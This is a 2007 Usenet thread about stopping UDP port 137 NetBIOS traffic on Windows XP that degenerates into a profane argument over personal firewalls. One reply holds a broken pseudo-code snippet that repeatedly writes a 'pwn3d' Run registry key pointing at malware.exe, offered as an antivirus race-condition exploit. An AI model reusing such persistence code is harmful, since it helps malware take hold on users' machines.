How to block upd port 137 traffic

Udp traffic is not as critical as tcp traffic. Nevertheless, I seem
not to be able to block some outgoing udp port 137 traffic
(netbios-ns) from my system. My PSF shows a listening state, however
no remote address (the executable is indicated as "system"). In my
PSF I have a top rule denying any traffic on my port 137 to and from
any remote port and address with any application. While this rule
stops all the traffic where there is a visible remote address, it
does not stop outgoing "system" traffic to unknown adresses.

Which automatic or enabled service may be responsible for that, if
at all? Any other hints ?

(Win xp pro sp2, stand alone, cable connection, windows file sharing
disabled)

Andy

Re: How to block upd port 137 traffic

Hi,

Andy prelignat wrote:
> Udp traffic is not as critical as tcp traffic.

Interesting thesis.


> Nevertheless, I seem
> not to be able to block some outgoing udp port 137 traffic
> (netbios-ns) from my system. My PSF shows a listening state, however
> no remote address (the executable is indicated as "system").


So there is the system listening on a port. Why do you think, listening
is related to talking? e.g.: Why should there be any traffic if there is
just a process listening?


Cheers,
Jens

Re: How to block upd port 137 traffic

"Jens Hoffmann" schrieb im Newsbeitrag
news:5bau3sF2s89rfU1@mid.uni-berlin.de...
> Hi,
>
> Andy prelignat wrote:
>> Udp traffic is not as critical as tcp traffic.
>
> Interesting thesis.
>
That's what I gathered from various sites while googleing. But you
seem to disagree. As a relative greenhorn I would welcome more
details.

>> Nevertheless, I seem
>> not to be able to block some outgoing udp port 137 traffic
>> (netbios-ns) from my system. My PSF shows a listening state,
>> however no remote address (the executable is indicated as
>> "system").
>
> So there is the system listening on a port. Why do you think,
> listening is related to talking? e.g.: Why should there be any
> traffic
> if there is just a process listening?

Because there are udp bytes sent. I wonder then where to?

Andy

Re: How to block upd port 137 traffic

Hi,

Andy prelignat schrieb:
> That's what I gathered from various sites while googleing. But you seem
> to disagree. As a relative greenhorn I would welcome more details.

There is no difference in threat between UDP or TCP. If there is
an increased danger, than it is if you run something you do not understand.

> Because there are udp bytes sent. I wonder then where to?

There are no packets sent without target address. So check them.
HAve a look at wiresharck for example.

Forget about PFW they are the first thing malware is going to attack.

Cheers,
Jens

Re: How to block upd port 137 traffic

On Sun, 20 May 2007 13:11:05 +0200, Andy prelignat wrote:

> Udp traffic is not as critical as tcp traffic. Nevertheless, I seem
> not to be able to block some outgoing udp port 137 traffic
> (netbios-ns) from my system. My PSF shows a listening state, however
> no remote address (the executable is indicated as "system"). In my
> PSF I have a top rule denying any traffic on my port 137 to and from
> any remote port and address with any application. While this rule
> stops all the traffic where there is a visible remote address, it
> does not stop outgoing "system" traffic to unknown adresses.
>
> Which automatic or enabled service may be responsible for that, if
> at all? Any other hints ?
>
> (Win xp pro sp2, stand alone, cable connection, windows file sharing
> disabled)
>
> Andy

Are you on a router? If so, you will see traffic between your system and
router on ports 137-139. Your firewall rule probably prohibits outgoing
traffic to the Internet, but there will still be local communication with
the router on those ports. If you're not using a router, then go into
Control Panel>Network and Internet Connections>Network Commections - then
right click your Connection - click on Properties>Networking - select
Internet Protocol (TCP/IP) and click on >Properties>Advanced>WINS (tab)-
then make sure "Disable NetBIOS over TCP/IP" is checked.

Re: How to block upd port 137 traffic

Many thanks for your help . This is real solution oriented support!
No udp bytes sent anymore!
Andy

"Bullseye" wrote:
>
> Are you on a router? If so, you will see traffic between your
> system and
> router on ports 137-139. Your firewall rule probably prohibits
> outgoing
> traffic to the Internet, but there will still be local
> communication with
> the router on those ports. If you're not using a router, then go
> into
> Control Panel>Network and Internet Connections>Network
> Commections - then
> right click your Connection - click on Properties>Networking -
> select
> Internet Protocol (TCP/IP) and click on >Properties>Advanced>WINS
> (tab)-
> then make sure "Disable NetBIOS over TCP/IP" is checked.

Re: How to block upd port 137 traffic

Andy prelignat wrote:

> Many thanks for your help . This is real solution oriented support!
> No udp bytes sent anymore!


Unfortunately the real problem still isn't solved yet: gross incompetence.
Because I don't think that the *official documentation* leaves any doubt on
this point:

>> then make sure "Disable NetBIOS over TCP/IP" is checked.

Re: How to block upd port 137 traffic

Post removed (X-No-Archive: yes)

Re: How to block upd port 137 traffic

Jimbo wrote:


>> Unfortunately the real problem still isn't solved yet: gross incompetence.
>> Because I don't think that the *official documentation* leaves any doubt on
>> this point:
>>
> The world is lucky to have only a few people like you
> who offer only sarcasm instead of help.

Let me get this straight:

- This guys has no fucking clue about his system, Windows, networking and
TCP/IP, yet he wants to run a firewall and even achieve a decent level of
security by doing so.
- He didn't even borther to read the fucking^W fine manual, where Microsoft
explicitly enumerates all relevant options regarding network communication
- Neither did he even try checking the most obvious option. Heck, if have
you activated NetBIOS TCP/IP transports, you really shouldn't wonder about
TCP/UDP traffic on ports 137-139. *It's supposed to work like that!*

How exactly do you think this will end? His firewall (that is none) will not
provide any security, fuck up his network and most likely pose as an
additions attack vector. His system will submit other information using
other protocols than NetBT, because he didn't even bother to configure it.
He'll keep on brabbling nonsense about network protocols he doesn't
understand, he ask further for even more misunderstood non-problems and
achieve absolutely nothing at the end.

Sorry for me trying to point out to him that he's a clueless wannabe who
should rather pay competent people for administrating his computer, like
we're paying repair men to repair our cars, paying plumbers to fix our
toilet and paying dumbsters to carry away our garbage.

Re: How to block upd port 137 traffic

Post removed (X-No-Archive: yes)

Re: How to block upd port 137 traffic

"Sebastian G." wrote:
> Jimbo wrote:
>
> > The world is lucky to have only a few people like you
>> who offer only sarcasm instead of help.

Don't worry, this is the ugly german's way of "helping".
That is also the reason why I do not write into German neswgroups.

"Jimbo" must be a real crack. I have neither the time nor do I feel
like becoming one.
I'm happy when my windows system and my antivirus software is
up-to-date, and since my softwarefirewall shows my TCP ports being
stealth in all free online test, such as GRC, Security Space,
PC-Flank, HackerWatch and others I think I achieve a "decent" level
of security. And I am well aware that there is no such thing as 100%
security. I run neither a bank nor any other company, nor do I run a
server, and I do observe the usual security measures when surfing
and mailing. Why in gods sake should I be a target for an attack?
That my new system was sending during a few days some UDP (not TCP)
bytes on port 137 did not shock me, nor that possibly other
protocols than netbios may send bytes to the world. Others may be
paranoid, not me.

Andy

Re: How to block upd port 137 traffic

On May 21, 6:41 pm, Jimbo wrote:
> In article <5bej67F2rgqc...@mid.dfncis.de>, s...@seppig.de says...
>
>
>
> > Jimbo wrote:
>
> > >> Unfortunately the real problem still isn't solved yet: gross incompetence.
> > >> Because I don't think that the *official documentation* leaves any doubt on
> > >> this point:
>
> > > The world is lucky to have only a few people like you
> > > who offer only sarcasm instead of help.
>
> > Let me get this straight:
>
> > - This guys has no fucking clue about his system, Windows, networking and
> > TCP/IP, yet he wants to run a firewall and even achieve a decent level of
> > security by doing so.
> > - He didn't even borther to read the fucking^W fine manual, where Microsoft
> > explicitly enumerates all relevant options regarding network communication
> > - Neither did he even try checking the most obvious option. Heck, if have
> > you activated NetBIOS TCP/IP transports, you really shouldn't wonder about
> > TCP/UDP traffic on ports 137-139. *It's supposed to work like that!*
>
> > How exactly do you think this will end? His firewall (that is none) will not
> > provide any security, fuck up his network and most likely pose as an
> > additions attack vector. His system will submit other information using
> > other protocols than NetBT, because he didn't even bother to configure it.
> > He'll keep on brabbling nonsense about network protocols he doesn't
> > understand, he ask further for even more misunderstood non-problems and
> > achieve absolutely nothing at the end.
>
> > Sorry for me trying to point out to him that he's a clueless wannabe who
> > should rather pay competent people for administrating his computer, like
> > we're paying repair men to repair our cars, paying plumbers to fix our
> > toilet and paying dumbsters to carry away our garbage.
>
> Why did you not point this out in a civil manner.
> That would have been HELP.
> Jim- Hide quoted text -
>
> - Show quoted text -

Re: How to block upd port 137 traffic

On May 20, 6:11 am, "Andy prelignat" wrote:
> Udp traffic is not as critical as tcp traffic. Nevertheless, I seem
> not to be able to block some outgoing udp port 137 traffic
> (netbios-ns) from my system. My PSF shows a listening state, however
> no remote address (the executable is indicated as "system"). In my
> PSF I have a top rule denying any traffic on my port 137 to and from
> any remote port and address with any application. While this rule
> stops all the traffic where there is a visible remote address, it
> does not stop outgoing "system" traffic to unknown adresses.
>
> Which automatic or enabled service may be responsible for that, if
> at all? Any other hints ?
>
> (Win xp pro sp2, stand alone, cable connection, windows file sharing
> disabled)
>
> Andy

just run in a NAT environment, the nature of NAT will cause the
packets to have trouble reaching your computer.

Re: How to block upd port 137 traffic

On May 20, 6:11 am, "Andy prelignat" wrote:
> Udp traffic is not as critical as tcp traffic. Nevertheless, I seem
> not to be able to block some outgoing udp port 137 traffic
> (netbios-ns) from my system. My PSF shows a listening state, however
> no remote address (the executable is indicated as "system"). In my
> PSF I have a top rule denying any traffic on my port 137 to and from
> any remote port and address with any application. While this rule
> stops all the traffic where there is a visible remote address, it
> does not stop outgoing "system" traffic to unknown adresses.
>
> Which automatic or enabled service may be responsible for that, if
> at all? Any other hints ?
>
> (Win xp pro sp2, stand alone, cable connection, windows file sharing
> disabled)
>
> Andy

just run in a NAT environment, the nature of NAT will cause the
packets to have trouble reaching your computer.

Re: How to block upd port 137 traffic

Hexalon wrote:


> just run in a NAT environment, the nature of NAT will cause the
> packets to have trouble reaching your computer.


"trouble" as in "troublesome, but can be easily circumvented and even fails
spontanously"? D'oh, even the RFC about NAT explicitly states that NAT is
not intended or suitable as a security mechanism.

Re: How to block upd port 137 traffic

Andy prelignat wrote:

> "Sebastian G." wrote:
>> Jimbo wrote:
>>
>>> The world is lucky to have only a few people like you
>>> who offer only sarcasm instead of help.
>
> Don't worry, this is the ugly german's way of "helping".
> That is also the reason why I do not write into German neswgroups.
>
> "Jimbo" must be a real crack. I have neither the time nor do I feel
> like becoming one.
> I'm happy when my windows system and my antivirus software is
> up-to-date,


So? Which one is your antivirus software? I'd be happy to present you
multiple security vulnerabilities that aren't even patched in the latest and
most up-to-date version?
Better not mentioning the security vulnerability in Windows that I recently
reported...

> and since my softwarefirewall shows my TCP ports being stealth


you have a serious network problem.

> in all free online test, such as GRC, Security Space, PC-Flank, HackerWatch


you can't even be sure that your configuration works as expected, since you
never bothered to run any test that is not totally fucked up.

> and others I think I achieve a "decent" level of security.

Must be interesting others, because based upon what you presented, there's
no indication of any security.

> And I am well aware that there is no such thing as 100% security.

Ah, the common argument to justify the common ignorance about the actual
important criteria like reliability and accountability of security measures,
yes, the ones you're lacking.

> Why in gods sake should I be a target for an attack?

- because computer programs are not intelligent enough to differ between
interesting and non-interesting target, that's why they simply target all
- because your system is a very easy target, with your "software firewall"
you're actually opening it up for various remote exploits
- because you can offer disk space and bandwidth

> That my new system was sending during a few days some UDP (not TCP)
> bytes on port 137 did not shock me,


Didn't? Ouch!

Re: How to block upd port 137 traffic

"Sebastian G." wrote:
> Andy prelignat wrote:
>
>> I'm happy when my windows system and my antivirus software is
>> up-to-date, .....

> So? Which one is your antivirus software? I'd be happy to present
you
> multiple security vulnerabilities that aren't even patched in the
> latest and most up-to-date version?

That may be correct. Right now i'm using the latest version of
Norman. If you know of any known and yet unpatched wholes (apart
from latest viruses) pls let the community know. Indicate the ng if
you post it elsewhere.

> Better not mentioning the security vulnerability in Windows that I
> recently reported...

.... and have not yet been patched by M$. Interesting. Pls expand on
that. (My OS Win xp pro sp2 with IE 7, stand alone)

>> and since my softwarefirewall shows my TCP ports being stealth

> you have a serious network problem.

Ahm, please be a bit more specific.

>> in all free online test, such as GRC, Security Space, PC-Flank,
>> HackerWatch

> you can't even be sure that your configuration works as expected,
> since you never bothered to run any test that is not totally
> fucked up.

All these tests are totally fucked up? Can I read somewhere online
some details about this rather tough qualification?
But you will sure recommend to me and the world some non fucked up
ones which are freely availbale online.

> > and others I think I achieve a "decent" level of security.

> Must be interesting others, because based upon what you presented,
> there's no indication of any security.

Others include HackerWacker, webscan.security-check.ch,
seccheck.onsite.ch, it-sec.de, as well as a number of specialized
tests.
But that means that I share this zero security with approx. 95 % or
more of private windows users. If there's "no indication of any
security" on my system I wonder how you would qualify those approx
80% of private windows users who have all doors wide open, unsecured
wlans, IE on the lowest security levels for all sites, etc, etc.?

> > Why in gods sake should I be a target for an attack?

> - because computer programs are not intelligent enough to differ
> between interesting and non-interesting target, that's why they
> simply target all

That is certainly true.

> - because your system is a very easy target, with your "software
> firewall"

Not that easy! Cause I'm quite sure that I have it configured as
welll as it can possibly be done.

> you're actually opening it up for various remote exploits
> - because you can offer disk space and bandwidth

So you think that my system could be a bot? and used for spamming
the world? Highly unlikely. The symptons for that would be all to
obvious.
Btw. the udp bytes that my system sent on port 137 for a few days
were regularly below 100 bytes.

You will certainly be able to contradict me in any of the above
replies. Please do so. But be aware that you will not be able to
turn me into becoming paranoid.

Cheers,
Andy

Re: How to block upd port 137 traffic

Andy prelignat wrote:


> That may be correct. Right now i'm using the latest version of
> Norman. If you know of any known and yet unpatched wholes (apart
> from latest viruses) pls let the community know. Indicate the ng if
> you post it elsewhere.


pthread t1, t2, p;

create_new_thread(&t1);
create_new_thread(&t2);

pthread p = getCurrentThread();
if (pCurrentThread == t1) {
while(TRUE)
RegWriteKeyEx(HKEY_LOCAL_MACHINE,L"Software\\Microsoft\\Wind ows\\CurrentVersion\\Run",L"pwn3d",REG_SZ,NULL,L"malware.exe );
}
if (pCurrentThread == t2) {
while(TRUE)
RegWriteKeyEx(HKEY_CURRENT_USER,L"Software\\Microsoft\\Windo ws\\CurrentVersion\\Run",L"pwn3d",REG_SZ,NULL,L"malware.exe) ;
}

Don't worry, McAfee, Symantec and CA all have the same problem of validating
volatile data directly in user-mode memory.

>> Better not mentioning the security vulnerability in Windows that I
>> recently reported...
>
> ... and have not yet been patched by M$. Interesting. Pls expand on
> that. (My OS Win xp pro sp2 with IE 7, stand alone)


Don't worry, it's just a way how a non-privileged user can crash the entire
system with a bluescreen. More details after the patch is released.

But, you know, I would have easily fixed it myself. Strange enough I can't
find the source code in the Windows CDROM...

>>> and since my softwarefirewall shows my TCP ports being stealth
>
>> you have a serious network problem.
>
> Ahm, please be a bit more specific.


- not RFC conformant
- fucks up various network protocols
- fucks up load balancing
- creates tons of repeated traffic

You know, "stealth" is commonly considered as defective for a reason.

>>> in all free online test, such as GRC, Security Space, PC-Flank,
>>> HackerWatch
>
>> you can't even be sure that your configuration works as expected,
>> since you never bothered to run any test that is not totally
>> fucked up.
>
> All these tests are totally fucked up? Can I read somewhere online
> some details about this rather tough qualification?


http://grcsucks.com/shieldsup.html and ff., just for a start. They all fail
even simplest consistency checks.

> But you will sure recommend to me and the world some non fucked up
> ones which are freely availbale online.


http://linux-sec.net/Audit/nmap.test.gwif.html

>
>>> and others I think I achieve a "decent" level of security.
>
>> Must be interesting others, because based upon what you presented,
>> there's no indication of any security.
>
> Others include HackerWacker, webscan.security-check.ch,
> seccheck.onsite.ch, it-sec.de, as well as a number of specialized
> tests.


No mention of employing least privilege principle? No mention of secure
configuration, which also includes shutting down unnecessary services?

> But that means that I share this zero security with approx. 95 % or
> more of private windows users.


Indeed.

> If there's "no indication of any
> security" on my system I wonder how you would qualify those approx
> 80% of private windows users who have all doors wide open, unsecured
> wlans, IE on the lowest security levels for all sites, etc, etc.?


Not any different. BTW, where's the difference on IE security settings? You
could configure it maximally secure and still it could be trivially exploited.

>> - because your system is a very easy target, with your "software
>> firewall"
>
> Not that easy! Cause I'm quite sure that I have it configured as
> welll as it can possibly be done.


Doesn't matter. It simply *is* the target. And even if not, it can be
trivially circumvented (anyone dare to comment on overlapping IP fragments?).

> So you think that my system could be a bot? and used for spamming
> the world? Highly unlikely. The symptons for that would be all to
> obvious.


Obvious to you? Doubtful.

> Btw. the udp bytes that my system sent on port 137 for a few days
> were regularly below 100 bytes.


So what? My malware would never even show up in these statistics. Neither
would about any serious malware from the last ten years.

> But be aware that you will not be able to turn me into becoming paranoid.

I'm not trying to. I'd jsut like to point out that you're much more clueless
than you think, and that deploying non-understand and mis-understood
(pseudo) security solutions won't help anything at all.

Re: I know that I know nothing (Socrates), was: How to block upd port 137 traffic

"Sebastian G." wrote:
> Andy prelignat wrote:
>
>> That may be correct. Right now i'm using the latest version of
>> Norman. If you know of any known and yet unpatched wholes (apart
>> from latest viruses) pls let the community know. Indicate the ng
>> if you post it elsewhere.

[scipt deleted]
What did u want to prove with this script?

> Don't worry, McAfee, Symantec and CA all have the same problem of
> validating volatile data directly in user-mode memory.

Well, Norman is one of the few with a sandbox technology that seems
to belong to the best, viz.
http://www.itseccity.de/?url=/content/markt/nachrichten/0410 14_mar_nac_norman.html

>>> Better not mentioning the security vulnerability in Windows that
>>> I recently reported...
>> ... and have not yet been patched by M$. Interesting. Pls expand
>> on that. (My OS Win xp pro sp2 with IE 7, stand alone)

> Don't worry, it's just a way how a non-privileged user can crash
> the entire system with a bluescreen. More details after the patch
> is released.

Ok, lets see what MS comes up with.

>>> you have a serious network problem.
>>
>> Ahm, please be a bit more specific.

> - not RFC conformant
> - fucks up various network protocols
> - fucks up load balancing
> - creates tons of repeated traffic

Suppose you are you talking of win xp in general and not of my
situation in particular.
If not, what makes you think like that?

> You know, "stealth" is commonly considered as defective for a
> reason.
Sorry, I don't understand that

> http://grcsucks.com/shieldsup.html and ff., just for a start. They
> all fail even simplest consistency checks.

I know this site. I do however not know of any similar site for e.g.
https://secure1.securityspace.com/smysecure/register.html or other
scans mentioned.
>
>> But you will sure recommend to me and the world some non fucked
>> up ones which are freely availbale online.
>
> http://linux-sec.net/Audit/nmap.test.gwif.html

Thanks, will try it out as well as some of the other scans
recommended on this site. And report back.

>>>> and others I think I achieve a "decent" level of security.

> No mention of employing least privilege principle? No mention of
> secure configuration, which also includes shutting down
> unnecessary services?

Well, these were simply a few examples and not meant to be
exhaustive. Bty I only use admin rights when needed and all
unnecessary services for my stand alone Workstation are disabled
based on infos from http://www.blackviper.com/WinXP/servicecfg.htm

>> If there's "no indication of any security" on my system I wonder
>> how you would qualify those approx 80% of private windows users
>> who have all doors wide open,

> Not any different.

That is slightly exaggerated, to be on the very safe side.

>>> - because your system is a very easy target, with your "software
>>> firewall"
>> Not that easy! Cause I'm quite sure that I have it configured as
>> welll as it can possibly be done.
> Doesn't matter. It simply *is* the target. And even if not, it can
> be trivially circumvented (anyone dare to comment on overlapping
> IP fragments?).

Nothing is impossible was Toyota's claim in TV advertising. But you
really seem to be a bit paranoid, according to you the average user
should stay away from the internet and go back to the
good old library ans snail mail.Therefore, I recommend the following
for you: http://geocities.com/fourparanoia/

>> So you think that my system could be a bot? and used for spamming
>> the world? Highly unlikely. The symptons for that would be all to
>> obvious.

> Obvious to you? Doubtful.

Yes my friend, obvious for me.

>> But be aware that you will not be able to turn me into becoming
>> paranoid.

> I'm not trying to. I'd jsut like to point out that you're much
> more clueless than you think,

That may well be true for all people. Alredy Socrates ( or was it
Plato?) said that all he knows was that he knows nothing. ;-)

Andy

Re: I know that I know nothing (Socrates), was: How to block updport 137 traffic

Andy prelignat wrote:

> "Sebastian G." wrote:
>> Andy prelignat wrote:
>>
>>> That may be correct. Right now i'm using the latest version of
>>> Norman. If you know of any known and yet unpatched wholes (apart
>>> from latest viruses) pls let the community know. Indicate the ng
>>> if you post it elsewhere.
>
> [scipt deleted]
> What did u want to prove with this script?


A privilege escalation vulnerability introduced by the "security" software
itself, and gross incompetence of the vendor.

>> Don't worry, McAfee, Symantec and CA all have the same problem of
>> validating volatile data directly in user-mode memory.
>
> Well, Norman is one of the few with a sandbox technology that seems
> to belong to the best, viz.
> http://www.itseccity.de/?url=/content/markt/nachrichten/0410 14_mar_nac_norman.html


What a nonsense.

>>>> you have a serious network problem.
>>> Ahm, please be a bit more specific.
>
>> - not RFC conformant
>> - fucks up various network protocols
>> - fucks up load balancing
>> - creates tons of repeated traffic
>
> Suppose you are you talking of win xp in general and not of my
> situation in particular.


No, your situation.

> If not, what makes you think like that?


You "stealth" nonsense is responsible for these defects.

> Nothing is impossible was Toyota's claim in TV advertising. But you
> really seem to be a bit paranoid, according to you the average user
> should stay away from the internet and go back to the
> good old library ans snail mail.


What a nonsense. My claim is that such pseudo security software just makes
things worse, especially for not so tech-savvy people.

>> I'm not trying to. I'd jsut like to point out that you're much
>> more clueless than you think,
>
> That may well be true for all people. Alredy Socrates ( or was it
> Plato?) said that all he knows was that he knows nothing. ;-)

The point is about knowing your limits and acting accordingly.